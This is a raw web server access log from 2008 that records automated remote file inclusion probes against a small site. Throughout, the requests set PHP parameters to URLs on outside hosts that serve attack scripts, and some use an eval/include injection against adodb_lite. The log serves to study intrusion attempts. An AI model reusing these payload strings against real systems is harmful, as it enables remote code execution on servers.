74.53.70.178 - - [05/Sep/2008:00:01:50 -0700] "GET /?basepath=http://www.on-linegames.com/arcade/id2.txt?? HTTP/1.1" 200 916 "-" "libwww-perl/5.79" "jainvestigation.com"
74.53.70.178 - - [05/Sep/2008:00:01:51 -0700] "GET /logs/?basepath=http://www.on-linegames.com/arcade/id2.txt?? HTTP/1.1" 200 1939 "-" "libwww-perl/5.79" "jainvestigation.com"
74.53.70.178 - - [05/Sep/2008:00:02:25 -0700] "GET /logs/access_080825.log//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.rockwellpta.org/fav.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.jainvestigation.com"
74.53.70.178 - - [05/Sep/2008:00:03:40 -0700] "GET /logs/access_080825.log//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.on-linegames.com/arcade/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.jainvestigation.com"
217.128.122.28 - - [05/Sep/2008:00:05:27 -0700] "GET /language/lang_german/lang_main_album.php?phpbb_root_path=http://willsponsor.org/.cgi/psy-bnc??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.jainvestigation.com"
217.128.122.28 - - [05/Sep/2008:00:05:27 -0700] "GET /logs/language/lang_german/lang_main_album.php?phpbb_root_path=http://willsponsor.org/.cgi/psy-bnc??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.jainvestigation.com"
74.54.108.82 - - [05/Sep/2008:00:05:49 -0700] "GET //templates/mangobery/footer.sample.php?Site_Path=http://www.freepoker.tv/cache/fffc8f0ea824bc8948beedf192698b87.dat?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.jainvestigation.com"
74.54.108.82 - - [05/Sep/2008:00:05:49 -0700] "GET /logs//templates/mangobery/footer.sample.php?Site_Path=http://www.freepoker.tv/cache/fffc8f0ea824bc8948beedf192698b87.dat?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.jainvestigation.com"
74.54.108.82 - - [05/Sep/2008:00:05:55 -0700] "GET //templates/mangobery/footer.sample.php?Site_Path=http://www.freepoker.tv/cache/fffc8f0ea824bc8948beedf192698b87.dat?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "jainvestigation.com"
74.54.108.82 - - [05/Sep/2008:00:05:55 -0700] "GET /logs//templates/mangobery/footer.sample.php?Site_Path=http://www.freepoker.tv/cache/fffc8f0ea824bc8948beedf192698b87.dat?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "jainvestigation.com"
213.92.85.234 - - [05/Sep/2008:00:06:34 -0700] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://clubmusic.caucasus.net/V7ID.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.jainvestigation.com"
213.92.85.234 - - [05/Sep/2008:00:06:34 -0700] "GET /logs/access.log/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://clubmusic.caucasus.net/V7ID.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.jainvestigation.com"
213.92.85.234 - - [05/Sep/2008:00:06:34 -0700] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://clubmusic.caucasus.net/V7ID.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.jainvestigation.com"
213.92.85.234 - - [05/Sep/2008:00:07:03 -0700] "GET /logs/access_080825.log/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://clubmusic.caucasus.net/V7ID.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.jainvestigation.com"
216.17.107.161 - - [05/Sep/2008:00:10:09 -0700] "GET /logs/access_080809.log/ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.setteb.it/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.jainvestigation.com"
216.17.107.161 - - [05/Sep/2008:00:10:09 -0700] "GET /ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.setteb.it/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.jainvestigation.com"
216.17.107.161 - - [05/Sep/2008:00:10:43 -0700] "GET /logs/ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.setteb.it/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.jainvestigation.com"
216.17.107.161 - - [05/Sep/2008:00:10:14 -0700] "GET /logs/access_080809.log/ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.setteb.it/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.jainvestigation.com"
216.17.107.161 - - [05/Sep/2008:00:10:15 -0700] "GET /ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.setteb.it/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.jainvestigation.com"
216.17.107.161 - - [05/Sep/2008:00:10:15 -0700] "GET /logs/ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.setteb.it/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.jainvestigation.com"
89.218.85.18 - - [05/Sep/2008:00:10:17 -0700] "GET //home.php?pagina=http://alan-stone.com/images/stories/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "jainvestigation.com"
89.218.85.18 - - [05/Sep/2008:00:10:17 -0700] "GET /logs/access.log//home.php?pagina=http://alan-stone.com/images/stories/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "jainvestigation.com"
89.218.85.18 - - [05/Sep/2008:00:10:17 -0700] "GET /logs//home.php?pagina=http://alan-stone.com/images/stories/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "jainvestigation.com"
66.249.129.210 - - [05/Sep/2008:00:10:46 -0700] "GET /logs/access.log/My_eGallery/public/mainGallery.php?basepath=http://www.rockwellpta.org/fav.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "jainvestigation.com"
66.249.129.210 - - [05/Sep/2008:00:10:46 -0700] "GET /My_eGallery/public/mainGallery.php?basepath=http://www.rockwellpta.org/fav.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "jainvestigation.com"
66.249.129.210 - - [05/Sep/2008:00:10:46 -0700] "GET /logs/My_eGallery/public/mainGallery.php?basepath=http://www.rockwellpta.org/fav.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "jainvestigation.com"
66.249.129.210 - - [05/Sep/2008:00:10:48 -0700] "GET /logs/access.log/My_eGallery/public/mainGallery.php?basepath=http://www.rockwellpta.org/fav.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "jainvestigation.com"
66.249.129.210 - - [05/Sep/2008:00:10:48 -0700] "GET /My_eGallery/public/mainGallery.php?basepath=http://www.rockwellpta.org/fav.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "jainvestigation.com"
66.249.129.210 - - [05/Sep/2008:00:10:48 -0700] "GET /logs/My_eGallery/public/mainGallery.php?basepath=http://www.rockwellpta.org/fav.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "jainvestigation.com"
74.55.98.10 - - [05/Sep/2008:00:10:52 -0700] "GET /logs/access.log/My_eGallery/public/mainGallery.php?basepath=http://www.rockwellpta.org/fav.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "jainvestigation.com"
74.55.98.10 - - [05/Sep/2008:00:10:52 -0700] "GET /My_eGallery/public/mainGallery.php?basepath=http://www.rockwellpta.org/fav.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "jainvestigation.com"
74.55.98.10 - - [05/Sep/2008:00:10:52 -0700] "GET /logs/My_eGallery/public/mainGallery.php?basepath=http://www.rockwellpta.org/fav.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "jainvestigation.com"
74.55.98.10 - - [05/Sep/2008:00:10:52 -0700] "GET /logs/access.log/My_eGallery/public/mainGallery.php?basepath=http://www.rockwellpta.org/fav.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "jainvestigation.com"
74.55.98.10 - - [05/Sep/2008:00:10:52 -0700] "GET /My_eGallery/public/mainGallery.php?basepath=http://www.rockwellpta.org/fav.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "jainvestigation.com"
74.55.98.10 - - [05/Sep/2008:00:10:52 -0700] "GET /logs/My_eGallery/public/mainGallery.php?basepath=http://www.rockwellpta.org/fav.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "jainvestigation.com"
66.249.129.210 - - [05/Sep/2008:00:11:29 -0700] "GET /logs/access.log/My_eGallery/public/mainGallery.php?basepath=http://www.rockwellpta.org/fav.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "jainvestigation.com"
66.249.129.210 - - [05/Sep/2008:00:11:29 -0700] "GET /My_eGallery/public/mainGallery.php?basepath=http://www.rockwellpta.org/fav.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "jainvestigation.com"
66.249.129.210 - - [05/Sep/2008:00:11:29 -0700] "GET /logs/My_eGallery/public/mainGallery.php?basepath=http://www.rockwellpta.org/fav.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "jainvestigation.com"
216.17.107.161 - - [05/Sep/2008:00:11:29 -0700] "GET /ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.setteb.it/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "jainvestigation.com"
216.17.107.161 - - [05/Sep/2008:00:11:29 -0700] "GET /logs/ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.setteb.it/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "jainvestigation.com"
89.253.240.227 - - [05/Sep/2008:00:12:12 -0700] "GET /logs/access.log/index.php?pag=http://www.borsaimmobiliare.net/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jainvestigation.com"
89.253.240.227 - - [05/Sep/2008:00:12:12 -0700] "GET /index.php?pag=http://www.borsaimmobiliare.net/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jainvestigation.com"
89.253.240.227 - - [05/Sep/2008:00:11:39 -0700] "GET /logs/index.php?pag=http://www.borsaimmobiliare.net/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jainvestigation.com"
147.202.44.247 - - [05/Sep/2008:00:11:43 -0700] "GET /logs/access.log//include/lib.inc.php?site_path=http://www.brguild.t5.com.br/forum//id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.jainvestigation.com"
147.202.44.247 - - [05/Sep/2008:00:11:44 -0700] "GET //include/lib.inc.php?site_path=http://www.brguild.t5.com.br/forum//id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.jainvestigation.com"
147.202.44.247 - - [05/Sep/2008:00:11:44 -0700] "GET /logs//include/lib.inc.php?site_path=http://www.brguild.t5.com.br/forum//id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.jainvestigation.com"
147.202.44.247 - - [05/Sep/2008:00:11:45 -0700] "GET /logs/access.log//include/lib.inc.php?site_path=http://rafiantika.fileave.com/child.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.jainvestigation.com"
147.202.44.247 - - [05/Sep/2008:00:11:45 -0700] "GET //include/lib.inc.php?site_path=http://rafiantika.fileave.com/child.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.jainvestigation.com"
147.202.44.247 - - [05/Sep/2008:00:11:45 -0700] "GET /logs//include/lib.inc.php?site_path=http://rafiantika.fileave.com/child.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.jainvestigation.com"
213.92.85.234 - - [05/Sep/2008:00:11:46 -0700] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://clubmusic.caucasus.net/V7ID.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "jainvestigation.com"
213.92.85.234 - - [05/Sep/2008:00:11:46 -0700] "GET /logs/access.log/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://clubmusic.caucasus.net/V7ID.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "jainvestigation.com"
213.92.85.234 - - [05/Sep/2008:00:11:46 -0700] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://clubmusic.caucasus.net/V7ID.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "jainvestigation.com"
74.55.98.10 - - [05/Sep/2008:00:11:48 -0700] "GET /logs/access.log/My_eGallery/public/mainGallery.php?basepath=http://www.rockwellpta.org/fav.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "jainvestigation.com"
74.55.98.10 - - [05/Sep/2008:00:11:48 -0700] "GET /My_eGallery/public/mainGallery.php?basepath=http://www.rockwellpta.org/fav.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "jainvestigation.com"
74.55.98.10 - - [05/Sep/2008:00:11:48 -0700] "GET /logs/My_eGallery/public/mainGallery.php?basepath=http://www.rockwellpta.org/fav.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "jainvestigation.com"
216.17.107.161 - - [05/Sep/2008:00:11:52 -0700] "GET /logs/access_080822.log/ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.setteb.it/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "jainvestigation.com"
216.17.107.161 - - [05/Sep/2008:00:11:52 -0700] "GET /ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.setteb.it/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "jainvestigation.com"
216.17.107.161 - - [05/Sep/2008:00:11:52 -0700] "GET /logs/ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.setteb.it/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "jainvestigation.com"
147.202.44.247 - - [05/Sep/2008:00:11:54 -0700] "GET /logs/access.log//include/lib.inc.php?site_path=http://rafiantika.fileave.com/child.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.jainvestigation.com"
147.202.44.247 - - [05/Sep/2008:00:11:55 -0700] "GET //include/lib.inc.php?site_path=http://rafiantika.fileave.com/child.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.jainvestigation.com"
147.202.44.247 - - [05/Sep/2008:00:11:55 -0700] "GET /logs//include/lib.inc.php?site_path=http://rafiantika.fileave.com/child.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.jainvestigation.com"
74.55.98.10 - - [05/Sep/2008:00:11:56 -0700] "GET /logs/access.log/My_eGallery/public/mainGallery.php?basepath=http://www.rockwellpta.org/fav.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "jainvestigation.com"
74.55.98.10 - - [05/Sep/2008:00:11:56 -0700] "GET /My_eGallery/public/mainGallery.php?basepath=http://www.rockwellpta.org/fav.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "jainvestigation.com"
74.55.98.10 - - [05/Sep/2008:00:11:56 -0700] "GET /logs/My_eGallery/public/mainGallery.php?basepath=http://www.rockwellpta.org/fav.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "jainvestigation.com"
74.55.98.10 - - [05/Sep/2008:00:11:58 -0700] "GET /logs/My_eGallery/public/mainGallery.php?basepath=http://www.rockwellpta.org/fav.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "jainvestigation.com"
74.53.70.178 - - [05/Sep/2008:00:12:04 -0700] "GET /logs/access.log/My_eGallery/public/mainGallery.php?basepath=http://www.rockwellpta.org/fav.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "jainvestigation.com"
74.53.70.178 - - [05/Sep/2008:00:12:04 -0700] "GET /My_eGallery/public/mainGallery.php?basepath=http://www.rockwellpta.org/fav.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "jainvestigation.com"
74.53.70.178 - - [05/Sep/2008:00:12:04 -0700] "GET /logs/My_eGallery/public/mainGallery.php?basepath=http://www.rockwellpta.org/fav.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "jainvestigation.com"
74.53.70.178 - - [05/Sep/2008:00:12:05 -0700] "GET /logs/access.log/My_eGallery/public/mainGallery.php?basepath=http://www.on-linegames.com/arcade/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "jainvestigation.com"
74.53.70.178 - - [05/Sep/2008:00:12:05 -0700] "GET /My_eGallery/public/mainGallery.php?basepath=http://www.on-linegames.com/arcade/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "jainvestigation.com"
74.53.70.178 - - [05/Sep/2008:00:12:06 -0700] "GET /logs/My_eGallery/public/mainGallery.php?basepath=http://www.on-linegames.com/arcade/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "jainvestigation.com"
43.244.132.32 - - [05/Sep/2008:00:12:15 -0700] "GET /logs//templates/mangobery/footer.sample.php?Site_Path=http://seolinks.karpiknet.com/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.802" "jainvestigation.com"
43.244.132.32 - - [05/Sep/2008:00:12:15 -0700] "GET //templates/mangobery/footer.sample.php?Site_Path=http://seolinks.karpiknet.com/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.802" "jainvestigation.com"
147.202.44.247 - - [05/Sep/2008:00:12:24 -0700] "GET //include/lib.inc.php?site_path=http://rafiantika.fileave.com/child.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.jainvestigation.com"
62.193.232.16 - - [05/Sep/2008:00:16:06 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.freepoker.tv/cache/fffc8f0ea824bc8948beedf192698b87.dat?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.jainvestigation.com"
62.193.232.16 - - [05/Sep/2008:00:16:07 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.freepoker.tv/cache/fffc8f0ea824bc8948beedf192698b87.dat?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.jainvestigation.com"
64.59.71.79 - - [05/Sep/2008:00:17:17 -0700] "GET /logs/access_080728.log/?sourcedir=http://zuppl.de/documents/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.jainvestigation.com"
64.59.71.79 - - [05/Sep/2008:00:17:17 -0700] "GET /?sourcedir=http://zuppl.de/documents/id2.txt?? HTTP/1.1" 200 916 "-" "libwww-perl/5.65" "www.jainvestigation.com"
64.59.71.79 - - [05/Sep/2008:00:17:18 -0700] "GET /logs/?sourcedir=http://zuppl.de/documents/id2.txt?? HTTP/1.1" 200 1939 "-" "libwww-perl/5.65" "www.jainvestigation.com"
201.238.195.13 - - [05/Sep/2008:00:17:43 -0700] "GET /logs/access.log/?sourcedir=http://avast4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "jainvestigation.com"
201.238.195.13 - - [05/Sep/2008:00:17:44 -0700] "GET /?sourcedir=http://avast4ever.t35.com/TT?? HTTP/1.1" 200 916 "-" "libwww-perl/5.79" "jainvestigation.com"
201.238.195.13 - - [05/Sep/2008:00:17:44 -0700] "GET /logs/?sourcedir=http://avast4ever.t35.com/TT?? HTTP/1.1" 200 1939 "-" "libwww-perl/5.79" "jainvestigation.com"
201.238.195.13 - - [05/Sep/2008:00:17:54 -0700] "GET /logs/access_080826.log/?sourcedir=http://avast4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.jainvestigation.com"
201.238.195.13 - - [05/Sep/2008:00:17:54 -0700] "GET /?sourcedir=http://avast4ever.t35.com/TT?? HTTP/1.1" 200 916 "-" "libwww-perl/5.79" "www.jainvestigation.com"
201.238.195.13 - - [05/Sep/2008:00:17:54 -0700] "GET /logs/?sourcedir=http://avast4ever.t35.com/TT?? HTTP/1.1" 200 1939 "-" "libwww-perl/5.79" "www.jainvestigation.com"
91.151.89.176 - - [05/Sep/2008:00:18:23 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.freepoker.tv/cache/fffc8f0ea824bc8948beedf192698b87.dat?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.jainvestigation.com"
91.151.89.176 - - [05/Sep/2008:00:18:23 -0700] "GET /modules/My_eGallery/index.php?basepath=http://www.freepoker.tv/cache/fffc8f0ea824bc8948beedf192698b87.dat?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.jainvestigation.com"
64.59.71.79 - - [05/Sep/2008:00:18:41 -0700] "GET /logs/access_080801.log/?sourcedir=http://zuppl.de/documents/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.jainvestigation.com"
201.6.251.5 - - [05/Sep/2008:00:18:46 -0700] "GET /logs/access.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.correiios.com/idddd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jainvestigation.com"
201.6.251.5 - - [05/Sep/2008:00:18:47 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.correiios.com/idddd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jainvestigation.com"
201.6.251.5 - - [05/Sep/2008:00:18:47 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.correiios.com/idddd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jainvestigation.com"
222.236.221.63 - - [05/Sep/2008:00:18:52 -0700] "GET /logs/access.log//index.php?sourcedir=http://www.sgki.es.bw.schule.de/EHEMALIGE/phpBB2/idd.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "jainvestigation.com"
64.246.42.3 - - [05/Sep/2008:00:19:42 -0700] "GET /logs/access_080825.log/modules/My_eGallery/index.php?basepath=http://www.correiios.com/idddd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.jainvestigation.com"
64.246.42.3 - - [05/Sep/2008:00:19:42 -0700] "GET /modules/My_eGallery/index.php?basepath=http://www.correiios.com/idddd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.jainvestigation.com"
64.246.42.3 - - [05/Sep/2008:00:19:42 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.correiios.com/idddd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.jainvestigation.com"
64.246.42.3 - - [05/Sep/2008:00:20:35 -0700] "GET /logs/access_080801.log/modules/My_eGallery/index.php?basepath=http://www.correiios.com/idddd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.jainvestigation.com"
64.59.71.79 - - [05/Sep/2008:00:20:30 -0700] "GET /logs/access_080825.log///vwar/backup/errors.php?error=http://zuppl.de/documents/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.jainvestigation.com"
64.59.71.79 - - [05/Sep/2008:00:20:30 -0700] "GET ///vwar/backup/errors.php?error=http://zuppl.de/documents/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.jainvestigation.com"
64.59.71.79 - - [05/Sep/2008:00:20:30 -0700] "GET /logs///vwar/backup/errors.php?error=http://zuppl.de/documents/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.jainvestigation.com"
64.59.71.79 - - [05/Sep/2008:00:23:29 -0700] "GET /logs/access.log///vwar/backup/errors.php?error=http://zuppl.de/documents/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.jainvestigation.com"
83.103.23.40 - - [05/Sep/2008:00:24:06 -0700] "GET /_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.handowire.com/bbs/Paddy/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jainvestigation.com"
83.103.23.40 - - [05/Sep/2008:00:24:06 -0700] "GET /_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.handowire.com/bbs/Paddy/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jainvestigation.com"
201.238.195.13 - - [05/Sep/2008:00:24:25 -0700] "GET /logs/access_080825.log///vwar/backup/errors.php?error=http://avast4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.jainvestigation.com"
201.238.195.13 - - [05/Sep/2008:00:24:26 -0700] "GET ///vwar/backup/errors.php?error=http://avast4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.jainvestigation.com"
201.238.195.13 - - [05/Sep/2008:00:24:26 -0700] "GET /logs///vwar/backup/errors.php?error=http://avast4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.jainvestigation.com"
217.64.195.220 - - [05/Sep/2008:00:24:43 -0700] "GET ///vwar/backup/errors.php?error=http://www.abd-solutions.de/images/stories/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jainvestigation.com"
89.221.163.68 - - [05/Sep/2008:00:25:58 -0700] "GET /logs/access_080825.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.mete.gov.al/doc/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jainvestigation.com"
89.221.163.68 - - [05/Sep/2008:00:25:58 -0700] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.mete.gov.al/doc/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jainvestigation.com"
89.221.163.68 - - [05/Sep/2008:00:25:58 -0700] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.mete.gov.al/doc/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jainvestigation.com"
89.221.163.68 - - [05/Sep/2008:00:26:28 -0700] "GET /logs/access.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.mete.gov.al/doc/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "jainvestigation.com"
89.221.163.68 - - [05/Sep/2008:00:26:28 -0700] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.mete.gov.al/doc/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "jainvestigation.com"
89.221.163.68 - - [05/Sep/2008:00:27:03 -0700] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.mete.gov.al/doc/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "jainvestigation.com"
212.122.200.198 - - [05/Sep/2008:00:27:55 -0700] "GET /e404.php?DOCUMENT_ROOT=http://www.handowire.com/bbs/Paddy/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "jainvestigation.com"
212.122.200.198 - - [05/Sep/2008:00:27:55 -0700] "GET /logs/e404.php?DOCUMENT_ROOT=http://www.handowire.com/bbs/Paddy/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "jainvestigation.com"
205.211.11.1 - - [05/Sep/2008:00:27:56 -0700] "GET /logs/access.log//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://br.geocities.com/kaizoku_56/sak4w/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "jainvestigation.com"
205.211.11.1 - - [05/Sep/2008:00:28:30 -0700] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://br.geocities.com/kaizoku_56/sak4w/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "jainvestigation.com"
205.211.11.1 - - [05/Sep/2008:00:27:56 -0700] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://br.geocities.com/kaizoku_56/sak4w/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "jainvestigation.com"
